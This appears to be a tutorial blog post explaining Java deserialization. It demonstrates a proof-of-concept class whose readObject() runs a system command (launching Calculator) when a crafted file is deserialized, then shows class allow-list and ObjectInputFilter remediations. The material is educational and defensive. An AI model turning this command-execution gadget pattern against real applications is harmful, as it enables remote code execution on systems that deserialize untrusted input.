Understanding Java De-serialization

So, What is Deserialization?

Demo Time

public class Employee implements java.io.Serializable {
    public String name;
    public String address;
    public transient int SSN;   // transient: never written to the stream, reads back as 0
    public int number;

    public void mailCheck() {
        System.out.println("Mailing a check to " + name + " " + address);
    }
}
import java.io.*;

public class SerializeDemo {
    public static void main(String[] args) {
        Employee e = new Employee();
        e.name = "Reyan Ali";
        e.address = "Phokka Kuan, Ambehta Peer";
        e.SSN = 11122333;
        e.number = 101;
        try {
            FileOutputStream fileOut = new FileOutputStream("/tmp/employee.ser");
            ObjectOutputStream out = new ObjectOutputStream(fileOut);
            out.writeObject(e); // Serialization done here
            out.close();
            fileOut.close();
            System.out.printf("Serialized data is saved in /tmp/employee.ser");
        } catch (IOException i) {
            i.printStackTrace();
        }
    }
}
Serialization code gets executed
Content of employee.ser
Base64 serialized data
import java.io.*;

public class DeserializeDemo {
    public static void main(String[] args) {
        Employee e = null;
        try {
            FileInputStream fileIn = new FileInputStream("/tmp/employee.ser");
            ObjectInputStream in = new ObjectInputStream(fileIn);
            e = (Employee) in.readObject(); // Deserialization done here
            in.close();
            fileIn.close();
        } catch (IOException i) {
            i.printStackTrace();
            return;
        } catch (ClassNotFoundException c) {
            System.out.println("Employee class not found");
            c.printStackTrace();
            return;
        }
        e.mailCheck();
        System.out.println("Deserialized Employee...");
        System.out.println("Name: " + e.name);
        System.out.println("Address: " + e.address);
        System.out.println("SSN: " + e.SSN);
        System.out.println("Number: " + e.number);
    }
}
e = (Employee) in.readObject();
Deserialization code gets executed
import java.io.IOException;

public class ExploitDeser implements java.io.Serializable {
    // Invoked by ObjectInputStream while the object is being read back,
    // before the caller's cast to Employee ever happens.
    private void readObject(java.io.ObjectInputStream in)
            throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
    }
}
import java.io.*;

public class SerializeDemo {
    public static void main(String[] args) {
        ExploitDeser e = new ExploitDeser();
        try {
            FileOutputStream fileOut = new FileOutputStream("/tmp/malicious.ser");
            ObjectOutputStream out = new ObjectOutputStream(fileOut);
            out.writeObject(e);
            out.close();
            fileOut.close();
            System.out.printf("Serialized data is saved in /tmp/malicious.ser");
        } catch (IOException i) {
            i.printStackTrace();
        }
    }
}
Provided malicious.ser as input to the DeserializeDemo class
Calculator Pops up

Remediation

import java.io.*;

class LookAheadObjectInputStream extends ObjectInputStream {
    public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
        super(inputStream);
    }

    // Called for every class descriptor in the stream, before any instance of
    // that class is created, so an unexpected class is rejected before its
    // readObject() can run.
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        if (!desc.getName().equals(Employee.class.getName())) {
            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
        }
        return super.resolveClass(desc);
    }
}
if (!desc.getName().equals(Employee.class.getName())) {
Modified DeserializeDemo class
Error in execution of serialized data of custom class
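The same look-ahead idea carried a step further, as an added example that is not the post's own code: the resolveClass() check generalised to an allow-list set, shown beside the JDK's built-in ObjectInputFilter (Java 9+, JEP 290), which gives the same protection without subclassing. Employee is the class from the post; SafeDeserializeDemo, AllowListObjectInputStream and the harmless Payload stand-in are assumed names constructed for this example.

```java
import java.io.*;
import java.util.Set;
// Added example, not the post's own code: the post's resolveClass() check generalised
// to an allow-list, beside the JDK's built-in ObjectInputFilter (Java 9+). Employee is
// the post's class; Payload is a harmless stand-in for any class the app did not expect.
public class SafeDeserializeDemo {
    static class AllowListObjectInputStream extends ObjectInputStream {
        private final Set<String> allowed;
        AllowListObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }
        // Runs when a class descriptor is read, i.e. before that class's readObject()
        // could execute: an unlisted class never gets that far.
        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!allowed.contains(desc.getName())) {
                throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
            }
            return super.resolveClass(desc);
        }
    }
    static class Payload implements Serializable { }   // constructed for the demo
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }
    // Reads one object through either guard; returns its class name or the rejection.
    static String tryRead(byte[] data, boolean useJdkFilter) throws IOException {
        ByteArrayInputStream bin = new ByteArrayInputStream(data);
        try (ObjectInputStream in = useJdkFilter ? new ObjectInputStream(bin)
                : new AllowListObjectInputStream(bin, Set.of(Employee.class.getName()))) {
            if (useJdkFilter) {  // JEP 290 pattern: allow Employee and its String fields, reject the rest
                in.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
                        Employee.class.getName() + ";java.lang.String;!*"));
            }
            return in.readObject().getClass().getName();
        } catch (InvalidClassException | ClassNotFoundException e) {
            return "rejected: " + e.getMessage();
        }
    }
    public static void main(String[] args) throws IOException {
        Employee e = new Employee();
        for (boolean jdk : new boolean[] {false, true}) {
            System.out.println(tryRead(serialize(e), jdk));
            System.out.println(tryRead(serialize(new Payload()), jdk));
        }
    }
}
```

Both guards accept the Employee stream and reject the Payload stream before any of its code runs; the JDK filter can also be set process-wide with the jdk.serialFilter system property instead of per stream.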


Swapneil Kumar Dash